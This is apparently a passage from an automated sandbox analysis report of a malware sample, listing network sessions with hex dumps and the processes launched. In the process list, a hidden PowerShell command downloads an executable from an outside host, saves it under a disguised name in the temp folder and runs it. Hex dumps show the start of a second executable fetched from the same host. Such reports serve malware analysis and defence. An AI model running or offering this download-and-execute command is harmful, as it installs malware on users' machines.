                                                          2024-12-06 14:42:08 UTC7808INData Raw: 28 04 92 5b 7c 61 50 1e d6 7b 44 4a 15 e9 91 1b cb 18 cd 0f 22 2a 13 c2 56 a6 aa ce 9a a6 b2 a1 33 2a 31 a5 41 8a 85 85 c5 4e a9 86 46 6e 33 68 15 6c 90 1d 66 18 3d de 40 a9 0a 3f d5 9c cc d3 69 f5 80 a8 2c ed 84 ba ae 15 44 33 8d 84 a3 1d ad 29 4c 46 a5 fa 93 76 55 7f 90 e8 54 d2 4b 2e b9 a4 1b e1 17 0f c6 74 43 c4 ac 11 9a 8b c0 bf fe fa eb bd b6 67 57 71 9a 15 af 40 96 55 9a 9f 63 31 60 71 6d 6b 19 75 3f e0 84 0e b6 af ec 46 f8 95 5b b1 38 ef bc f3 38 79 dc fe e8 8f 67 fc 64 57 3e 1f 55 52 47 ca 84 de 8d e1 a1 87 1e 62 99 72 57 a5 56 4f a7 bc 62 b6 d9 66 63 e7 fe 13 7e c6 19 17 3d 82 5e bd 7a 29 85 b2 9c b9 0b 5e 41 54 3c d0 14 66 9e 79 66 89 5d a7 db 6e bb 2d 0b f3 d2 f2 e9 55 57 5d 25 40 34 25 60 39 e7 ce 3b ef 5c 6e 42 59 1d 6d 76 2f fc a8 59 41 ad
                                                          Data Ascii: ([|aP{DJ"*V3*1ANFn3hlf=@?i,D3)LFvUTK.tCgWq@Uc1`qmku?F[88ygdW>URGbrWVObfc~=^z)^AT<fyf]n-UW]%@4%`9;\nBYmv/YA
                                                          2024-12-06 14:42:08 UTC8192INData Raw: 6a 3f 55 69 5b b9 ee 85 9d ef f1 2b 02 fc f3 9f ff ac 79 69 55 51 bd 13 bf 4e d9 69 48 e5 1e bf 91 48 fc 6a da e8 2f f1 1b 5c b9 87 b6 66 ca ea e9 9d 88 5f ab 54 83 db dd a5 d6 49 c9 35 c1 3a 71 c2 6a 27 dd 57 2b 43 86 f7 1e bf fe 46 c7 90 8f df 1b d9 2a 61 2f 35 a8 47 ed b5 3a 46 ab 9c d5 54 5f bb 79 6c e2 26 3a a5 eb de 4b 5b a3 6b b0 d7 ba 1d 3e e2 57 3d d4 5f e2 57 b5 57 6b 59 e9 74 e1 ac c6 b2 3a d9 b1 5f f1 d8 9d 76 b2 45 3c f7 5d e6 38 c3 0c 33 54 c7 fd 8c 13 bf b6 57 67 8a 30 6d c3 ad 13 75 e9 e4 cc 25 b1 b7 46 c7 f0 11 bf ee 81 36 20 c4 af ad 00 9d 44 6a eb 4e b5 e9 74 59 74 14 81 bb 57 c6 32 d0 2e bb ec 52 dd 8b eb 5e d1 da d6 ac 68 50 bd 67 b8 15 6d 85 e9 dd 27 ab a7 77 89 df de 95 dc 25 cf 74 e1 d2 9f 59 54 f3 5b f9 5a 9d 45 a7 1a fd c6 c7 1f
                                                          Data Ascii: j?Ui[+yiUQNiHHj/\f_TI5:qj'W+CF*a/5G:FT_yl&:K[k>W=_WWkYt:_vE<]83TWg0mu%F6 DjNtYtW2.R^hPgm'w%tYT[ZE
                                                          2024-12-06 14:42:08 UTC7808INData Raw: c4 c2 40 aa b0 18 31 71 4b d4 a2 40 26 66 1a a9 43 34 21 72 58 10 3d 58 5f 73 4e d1 84 86 45 3f 08 b3 2c 5a fa b1 f6 14 08 7e 6c 2b 2d 3e 13 e5 8f 6f f3 4c 0a 19 67 9c 71 76 da 69 a7 88 be db 6e bb 8d 12 d8 c8 21 9c 87 73 72 78 f5 c2 40 32 8c 3a f5 c2 0b 2f 44 3f 34 43 ab 7e 74 28 fc 2d 42 23 ea 02 9f c1 e4 fb 54 5d c0 9a 48 0c aa 5f a5 67 a3 0b 49 c1 c5 49 ba 13 3f 7a a0 52 9e 43 b7 92 b0 52 b5 c9 26 9b 84 9f 4b 65 e4 a7 40 0a a7 1f 64 4c 18 c6 06 0b 3f 11 56 d6 4a a5 2b 65 9d 5a 62 23 54 88 f1 2b 7a 88 ca 65 7d 27 cf 3b 2a 5e 78 1a d7 e5 69 6d 2f 25 28 22 9c c7 b9 34 80 54 50 26 17 d2 58 00 52 0b 8b b0 23 57 37 59 29 dd 1c 55 76 8d 25 ff 78 48 81 9e 79 9d fe e9 5f 7b 6d 08 c9 db 49 22 fa 84 bf 1c c2 3d 7a d4 ea 17 1e d6 1d fc 3c 96 81 82 9d ce 31 6a 9a
                                                          Data Ascii: @1qK@&fC4!rX=X_sNE?,Z~l+->oLgqvin!srx@2:/D?4C~t(-B#T]H_gII?zRCR&Ke@dL?VJ+eZb#T+ze}';*^xim/%("4TP&XR#W7Y)Uv%xHy_{mI"=z<1j
                                                          2024-12-06 14:42:08 UTC4544INData Raw: 63 8e 39 fa b5 04 56 ac d5 05 a9 0f bf ea ef 70 9f 1c ac 1a 68 e0 e5 97 5f f6 f9 8f 7f fc e3 34 d3 4c 13 cb bd 17 5f 7c f1 c7 3f fe f1 f2 cb 2f df 76 5d ac 46 48 b9 8f 3d f6 d8 a7 2d ee e7 10 eb ae bb ee 80 13 3f 6e cc 81 0b f1 1b b9 90 18 95 e9 3d f6 d8 43 7e 18 d9 b2 7c aa 30 f1 b9 e7 9e bb 47 e2 f7 d9 47 17 e2 67 e1 af 7c 0c 07 f1 93 4c 38 fc ee bb ef 3e e0 49 af 5f c4 ef f9 e7 9f 9f 76 da 69 93 f8 f5 89 1a f1 db 7b ef bd 67 9b 6d 36 b5 60 e4 4a 15 f8 f4 89 df c1 07 1f 3c c9 24 93 7c ae 89 9f 25 9b 29 0c 07 f1 13 f2 df fe f6 b7 3f d7 c4 af 8a 07 1f 7c 70 ac b1 c6 62 d0 11 dc 76 1b 0e e2 f7 c4 13 4f 88 a9 cf 1a f1 ab e2 c8 23 8f ec 91 f8 25 7a c1 7f ff fb 5f f1 a2 98 8e 3b ee b8 53 4e 39 a5 c2 1a c4 ef e2 8b 2f de 6e bb ed 26 9f 7c 72 da 46 b6 df 7d f7
                                                          Data Ascii: c9Vph_4L_|?/v]FH=-?n=C~|0GGg|L8>I_vi{gm6`J<$|%)?|pbvO#%z_;SN9/n&|rF}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.11497613.219.243.2264433796C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-06 14:42:21 UTC1353OUTOPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                          Host: p13n.adobe.io
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Access-Control-Request-Method: GET
                                                          Access-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-key
                                                          Origin: https://rna-resource.acrobat.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://rna-resource.acrobat.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-06 14:42:22 UTC572INHTTP/1.1 204 No Content
                                                          Server: openresty
                                                          Date: Fri, 06 Dec 2024 14:42:22 GMT
                                                          Content-Type: text/plain
                                                          Content-Length: 0
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, OPTIONS
                                                          Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id
                                                          Access-Control-Allow-Credentials: true
                                                          Access-Control-Expose-Headers: x-request-id
                                                          X-Request-Id: cxdwBCsucDBiXD7cI4EFml9KH2iegfA7
                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.11497673.219.243.2264433796C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-06 14:42:23 UTC1473OUTGET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                          Host: p13n.adobe.io
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Chromium";v="105"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                          x-adobe-uuid: 14bb0f07-155a-4922-8830-76ed60af57ca
                                                          x-adobe-uuid-type: visitorId
                                                          x-api-key: AdobeReader9
                                                          sec-ch-ua-platform: "Windows"
                                                          Origin: https://rna-resource.acrobat.com
                                                          Accept-Language: en-US,en;q=0.9
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://rna-resource.acrobat.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          2024-12-06 14:42:24 UTC617INHTTP/1.1 429 Too Many Requests
                                                          Server: openresty
                                                          Date: Fri, 06 Dec 2024 14:42:23 GMT
                                                          Content-Type: application/json
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Headers: Authorization, Content-Type, X-Api-Key, cache-control, User-Agent, If-None-Match, x-adobe-uuid, x-adobe-uuid-type, X-Request-Id
                                                          Access-Control-Expose-Headers: x-request-id
                                                          Access-Control-Allow-Methods: GET, OPTIONS
                                                          Access-Control-Allow-Credentials: true
                                                          X-Request-Id: BhsTUMtMBz6x7izm4MgfyJZ4UGQp67KM
                                                          Retry-After: 1
                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                          2024-12-06 14:42:24 UTC65INData Raw: 33 36 0d 0a 7b 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 22 34 32 39 30 35 30 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 22 7d 0a 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 36{"error_code":"429050","message":"Too many requests"}0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.1149794101.99.75.1744433400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-06 14:42:35 UTC181OUTGET /private/nois.exe HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: badlarrysguitars.com
                                                          Connection: Keep-Alive
                                                          2024-12-06 14:42:35 UTC337INHTTP/1.1 200 OK
                                                          Date: Fri, 06 Dec 2024 14:42:35 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Content-Length: 64487543
                                                          Last-Modified: Tue, 19 Nov 2024 17:09:39 GMT
                                                          Content-Disposition: inline; filename=nois.exe
                                                          Cache-Control: no-cache
                                                          ETag: "1732036179.0-64487543-2940406643"
                                                          Connection: close
                                                          Content-Type: application/x-msdos-program
                                                          2024-12-06 14:42:35 UTC7855INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e 11 0d a7 5a 70 63 f4 5a 70 63 f4 5a 70 63 f4 11 08 60 f5 5d 70 63 f4 11 08 66 f5 ee 70 63 f4 11 08 67 f5 50 70 63 f4 99 f3 9e f4 59 70 63 f4 99 f3 60 f5 53 70 63 f4 99 f3 67 f5 4b 70 63 f4 99 f3 66 f5 72 70 63 f4 11 08 62 f5 51 70 63 f4 5a 70 62 f4 c1 70 63 f4 4f f4 67 f5 43 70 63 f4 4f f4 61 f5 5b 70 63 f4 52 69 63 68 5a 70 63 f4 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ZpcZpcZpc`]pcfpcgPpcYpc`SpcgKpcfrpcbQpcZpbpcOgCpcOa[pcRichZpcPEd
                                                          2024-12-06 14:42:35 UTC7860INData Raw: 48 8d 05 32 92 02 00 8b d3 48 8d 4c 24 30 48 89 44 24 20 e8 b9 f1 ff ff 85 c0 78 19 48 63 c8 48 8d 7c 24 30 8b f0 48 03 f9 2b d8 b8 00 00 00 00 0f 49 c3 8b d8 48 63 db e8 54 e5 ff ff 4c 89 74 24 28 4c 8b cd 4c 8b c3 48 c7 44 24 20 00 00 00 00 48 8b d7 48 8b 08 48 83 c9 02 e8 75 1e 01 00 4c 8d 0d da 91 02 00 c7 44 24 20 30 00 00 00 4c 8d 05 e3 91 02 00 8b d6 48 8d 4c 24 30 e8 ef fa ff ff 48 8b 8c 24 30 10 00 00 48 33 cc e8 0f 9a 00 00 48 81 c4 40 10 00 00 41 5e 5f 5e 5d 5b c3 cc 48 89 4c 24 08 48 89 54 24 10 4c 89 44 24 18 4c 89 4c 24 20 53 55 56 57 41 56 b8 40 20 00 00 e8 dc 9c 00 00 48 2b e0 48 8b 05 c2 b4 03 00 48 33 c4 48 89 84 24 30 20 00 00 48 8b e9 4c 8d b4 24 78 20 00 00 48 8d 7c 24 30 bb 00 10 00 00 33 f6 e8 5b 26 01 00 44 8b c8 4c 8d 05 99 90 02
                                                          Data Ascii: H2HL$0HD$ xHcH|$0H+IHcTLt$(LLHD$ HHHuLD$ 0LHL$0H$0H3H@A^_^][HL$HT$LD$LL$ SUVWAV@ H+HH3H$0 HL$x H|$03[&DL
                                                          2024-12-06 14:42:35 UTC8192INData Raw: 82 79 30 00 00 45 03 d2 44 0b d0 41 81 c2 98 fd ff ff 41 83 fa 0b 0f 87 1a 01 00 00 48 8d 15 7a b6 ff ff 49 63 c2 8b 8c 82 ac 4a 00 00 48 03 ca ff e1 48 8b 05 54 d4 03 00 48 8d 4d e0 4d 63 c8 48 8b d3 4c 8d 83 00 01 00 00 4c 89 5c 24 20 ff 15 f8 6a 02 00 0f 10 00 0f 10 48 10 c7 83 f8 00 00 00 01 00 00 00 48 8b 05 c8 d4 03 00 48 8d 4d e0 0f 29 45 e0 0f 29 4d f0 ff 15 ce 6a 02 00 f7 d8 1b c0 48 8b 5c 24 60 48 83 c4 50 5d c3 48 8b 05 f8 d3 03 00 48 8d 4d e0 4d 63 c8 48 8b d3 4c 8d 83 20 01 00 00 4c 89 5c 24 20 ff 15 9c 6a 02 00 0f 10 00 0f 10 48 10 c7 83 18 01 00 00 01 00 00 00 eb a2 48 8b 05 c2 d3 03 00 48 8d 4d e0 4d 63 c8 48 8b d3 4c 8d 83 38 01 00 00 4c 89 5c 24 20 ff 15 66 6a 02 00 0f 10 00 0f 10 48 10 c7 83 30 01 00 00 01 00 00 00 e9 69 ff ff ff 48 8b
                                                          Data Ascii: y0EDAAHzIcJHHTHMMcHLL\$ jHHHM)E)MjH\$`HP]HHMMcHL L\$ jHHHMMcHL8L\$ fjH0iH
                                                          2024-12-06 14:42:35 UTC7808INData Raw: 49 4b 02 00 48 8b c8 48 8b 05 1f b6 03 00 ff 15 39 4b 02 00 48 8b 4b 38 48 8b 05 5e b6 03 00 ff 15 28 4b 02 00 0b f8 48 8b 4b 38 75 91 48 8b 05 e1 b5 03 00 48 8d 15 e2 68 02 00 44 8b cd 45 33 c0 ff 15 06 4b 02 00 48 8b 4b 38 48 8d 15 db 68 02 00 48 8b 05 bc b5 03 00 44 8b cd 45 33 c0 ff 15 e8 4a 02 00 8b 93 68 30 00 00 48 8b 8b 60 30 00 00 48 8b 05 c4 b5 03 00 ff 15 ce 4a 02 00 48 8b 4b 38 48 8d 15 b3 68 02 00 4c 8b c8 89 6c 24 20 48 8b 05 ad b5 03 00 45 33 c0 ff 15 ac 4a 02 00 48 8b 8b 60 30 00 00 e8 20 e5 00 00 44 8b 83 58 30 00 00 44 8b cd 48 8b 93 50 30 00 00 48 8b 4b 38 4c 89 b3 60 30 00 00 48 8b 05 8d b5 03 00 ff 15 77 4a 02 00 85 c0 74 21 48 8b 4b 38 48 8b 05 68 b5 03 00 ff 15 62 4a 02 00 48 8b c8 48 8b 05 38 b5 03 00 ff 15 52 4a 02 00 48 8b 05 d3
                                                          Data Ascii: IKHH9KHK8H^(KHK8uHHhDE3KHK8HhHDE3Jh0H`0HJHK8HhLl$ HE3JH`0 DX0DHP0HK8L`0HwJt!HK8HhbJHH8RJH
                                                          2024-12-06 14:42:35 UTC4544INData Raw: 00 49 8b ce eb 15 48 8d 15 64 4d 02 00 48 8b c8 48 8b d8 e8 3d fa 00 00 48 8b cb e8 2d c7 00 00 8b c6 48 8b 8c 24 40 20 00 00 48 33 cc e8 3b 3d 00 00 4c 8d 9c 24 50 20 00 00 49 8b 5b 28 49 8b 6b 30 49 8b e3 41 5e 5f 5e c3 cc cc cc b8 38 40 00 00 e8 16 40 00 00 48 2b e0 48 8b 05 fc 57 03 00 48 33 c4 48 89 84 24 20 40 00 00 45 33 c0 33 d2 e8 37 0b 00 00 41 b8 00 10 00 00 48 8d 54 24 20 48 8b c8 ff 15 a3 28 02 00 ff c8 3d fe 0f 00 00 77 4c 41 b8 00 10 00 00 48 8d 94 24 20 20 00 00 48 8d 4c 24 20 ff 15 89 28 02 00 ff c8 3d fe 0f 00 00 77 2a 45 33 c0 48 8d 8c 24 20 20 00 00 33 d2 e8 96 0b 00 00 48 8b 8c 24 20 40 00 00 48 33 cc e8 96 3c 00 00 48 81 c4 38 40 00 00 c3 33 c0 48 8b 8c 24 20 40 00 00 48 33 cc e8 7c 3c 00 00 48 81 c4 38 40 00 00 c3 cc cc cc cc b8 38
                                                          Data Ascii: IHdMHH=H-H$@ H3;=L$P I[(Ik0IA^_^8@@H+HWH3H$ @E337AHT$ H(=wLAH$ HL$ (=w*E3H$ 3H$ @H3<H8@3H$ @H3|<H8@8
                                                          2024-12-06 14:42:35 UTC8192INData Raw: f8 41 8b c3 48 c1 e8 10 44 0f b6 c0 41 8b c3 48 c1 e8 08 0f b6 d0 49 c1 eb 18 43 8b 84 81 b0 eb 02 00 41 33 84 91 b0 e7 02 00 43 33 84 99 b0 ef 02 00 44 33 e0 8b c3 48 c1 e8 10 44 0f b6 c0 8b c3 48 c1 e8 08 0f b6 d0 48 c1 eb 18 43 8b 84 81 b0 eb 02 00 41 33 84 91 b0 e7 02 00 41 33 84 99 b0 ef 02 00 44 33 e8 8b c7 48 c1 e8 10 44 0f b6 c0 8b c7 48 c1 e8 08 0f b6 d0 48 c1 ef 18 43 8b 84 81 b0 eb 02 00 41 33 84 91 b0 e7 02 00 41 33 84 b9 b0 ef 02 00 8b 54 24 38 33 d0 89 54 24 38 49 83 ee 01 0f 85 73 fe ff ff 48 8b 7c 24 40 48 8b 5c 24 30 33 0e 0f b6 d1 c1 e9 08 4c 8b 74 24 08 41 33 8c 91 b0 db 02 00 0f b6 d1 c1 e9 08 41 33 8c 91 b0 db 02 00 0f b6 d1 c1 e9 08 41 33 8c 91 b0 db 02 00 0f b6 d1 c1 e9 08 41 33 8c 91 b0 db 02 00 33 4e 04 41 33 cf 4c 8b 3c 24 0f b6
                                                          Data Ascii: AHDAHICA3C3D3HDHHCA3A3D3HDHHCA3A3T$83T$8IsH|$@H\$03Lt$A3A3A3A33NA3L<$
                                                          2024-12-06 14:42:36 UTC7808INData Raw: a8 00 00 00 04 75 0c 45 85 ff b8 fb ff ff ff 44 0f 44 f8 41 8b c7 eb 05 b8 fe ff ff ff 48 83 c4 58 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 0f 1f 00 da a2 00 00 7b a4 00 00 39 a5 00 00 c8 a5 00 00 4d a6 00 00 e5 a6 00 00 90 a7 00 00 37 a8 00 00 e0 a8 00 00 b2 a9 00 00 f1 a9 00 00 26 aa 00 00 32 aa 00 00 c4 ab 00 00 37 ac 00 00 3f ac 00 00 ad ac 00 00 38 ad 00 00 6e ae 00 00 e9 b1 00 00 f1 b1 00 00 0d b4 00 00 70 b4 00 00 f0 b5 00 00 45 b6 00 00 0c b7 00 00 3d b7 00 00 1c b8 00 00 ba b8 00 00 cc b8 00 00 a6 ab 00 00 bb b9 00 00 cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 48 85 c9 74 66 48 83 79 30 00 74 5f 48 83 79 38 00 74 58 48 8b 41 28 48 85 c0 74 4f 48 39 08 75 4a 8b 40 08 2d 34 3f 00 00 83 f8 1f 77 3d 48 8b 41 28 48 8b 50 40 48 85 d2
                                                          Data Ascii: uEDDAHXA_A^A]A\_^][{9M7&27?8npE=@SH HHtfHy0t_Hy8tXHA(HtOH9uJ@-4?w=HA(HP@H
                                                          2024-12-06 14:42:36 UTC8192INData Raw: 44 cb 0c b1 01 4d 03 c4 41 ff d0 ff c7 44 8b 03 41 3b f8 0f 82 55 ff ff ff b8 01 00 00 00 4c 8d 5c 24 40 49 8b 5b 30 49 8b 6b 38 49 8b 73 40 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 cc 48 83 ec 28 e8 df 03 00 00 84 c0 75 04 32 c0 eb 12 e8 66 03 00 00 84 c0 75 07 e8 11 04 00 00 eb ec b0 01 48 83 c4 28 c3 48 83 ec 28 84 c9 75 0a e8 8f 03 00 00 e8 f6 03 00 00 b0 01 48 83 c4 28 c3 cc cc cc 48 3b ca 74 19 48 83 c2 09 48 8d 41 09 48 2b d0 8a 08 3a 0c 10 75 0a 48 ff c0 84 c9 75 f2 33 c0 c3 1b c0 83 c8 01 c3 cc cc cc cc cc 48 85 c9 74 67 88 54 24 10 48 83 ec 48 81 39 63 73 6d e0 75 53 83 79 18 04 75 4d 8b 41 20 2d 20 05 93 19 83 f8 02 77 40 48 8b 41 30 48 85 c0 74 37 48 63 50 04 85 d2 74 11 48 03 51 38 48 8b 49 28 e8 2a 00 00 00 eb 20 eb 1e f6 00 10 74 19 48 8b 41
                                                          Data Ascii: DMADA;UL\$@I[0Ik8Is@IA_A^A]A\_H(u2fuH(H(uH(H;tHHAH+:uHu3HtgT$HH9csmuSyuMA - w@HA0Ht7HcPtHQ8HI(* tHA
                                                          2024-12-06 14:42:36 UTC7808INData Raw: 00 00 eb 02 33 c0 48 83 c4 20 5b c3 cc 44 89 4c 24 20 4c 89 44 24 18 48 89 4c 24 08 53 56 57 41 54 41 55 41 56 41 57 48 83 ec 30 45 8b e1 49 8b f0 48 8b da 4c 8b f9 e8 29 ec ff ff 4c 8b e8 48 89 44 24 28 4c 8b c6 48 8b d3 49 8b cf e8 f3 ec ff ff 8b f8 e8 84 e2 ff ff ff 40 30 83 ff ff 0f 84 eb 00 00 00 41 3b fc 0f 8e e2 00 00 00 83 ff ff 0f 8e 14 01 00 00 3b 7e 04 0f 8d 0b 01 00 00 4c 63 f7 e8 dd eb ff ff 48 63 4e 08 4a 8d 04 f0 8b 3c 01 89 7c 24 20 e8 c9 eb ff ff 48 63 4e 08 4a 8d 04 f0 83 7c 01 04 00 74 1c e8 b5 eb ff ff 48 63 4e 08 4a 8d 04 f0 48 63 5c 01 04 e8 a3 eb ff ff 48 03 c3 eb 02 33 c0 48 85 c0 74 59 44 8b c7 48 8b d6 49 8b cf e8 bd ec ff ff e8 84 eb ff ff 48 63 4e 08 4a 8d 04 f0 83 7c 01 04 00 74 1c e8 70 eb ff ff 48 63 4e 08 4a 8d 04 f0 48 63
                                                          Data Ascii: 3H [DL$ LD$HL$SVWATAUAVAWH0EIHL)LHD$(LHI@0A;;~LcHcNJ<|$ HcNJ|tHcNJHc\H3HtYDHIHcNJ|tpHcNJHc
                                                          2024-12-06 14:42:36 UTC4544INData Raw: 00 00 8b ce eb 1e 40 f6 c6 01 74 59 40 84 f5 74 07 45 3b f0 76 54 eb 05 45 3b f1 76 50 b9 01 00 00 00 8b c6 23 ee 41 c6 45 30 01 41 c7 45 2c 22 00 00 00 85 c8 75 06 41 83 ce ff eb 30 48 8b 57 08 85 ed 74 10 48 85 d2 74 06 48 8b 0f 48 89 0a 41 8b c0 eb 2a 48 85 d2 74 06 48 8b 0f 48 89 0a 41 8b c1 eb 1a 40 84 f5 74 03 41 f7 de 48 8b 57 08 48 85 d2 74 06 48 8b 0f 48 89 0a 41 8b c6 48 8b 9c 24 f0 00 00 00 48 81 c4 a0 00 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 30 44 8b 41 34 40 8a ea 48 8b d9 41 be 08 00 00 00 41 83 f8 05 0f 8f c9 00 00 00 74 2d 45 85 c0 0f 84 15 01 00 00 41 83 e8 01 0f 84 8b 00 00 00 41 83 e8 01 74 5d 41 83 e8 01 0f 84 fb 00 00 00 41 83 f8 01 0f 85 bd 00 00 00
                                                          Data Ascii: @tY@tE;vTE;vP#AE0AE,"uA0HWtHtHHA*HtHHA@tAHWHtHHAH$HA_A^A]A\_^]HHXHhHpHx AVH0DA4@HAAt-EAAt]AA


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:09:41:55
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden"
                                                          Imagebase:0x7ff6eb350000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:09:41:55
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:09:41:58
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://badlarrysguitars.com/share/drp.exe -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe)
                                                          Imagebase:0x7ff6eb350000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:09:41:58
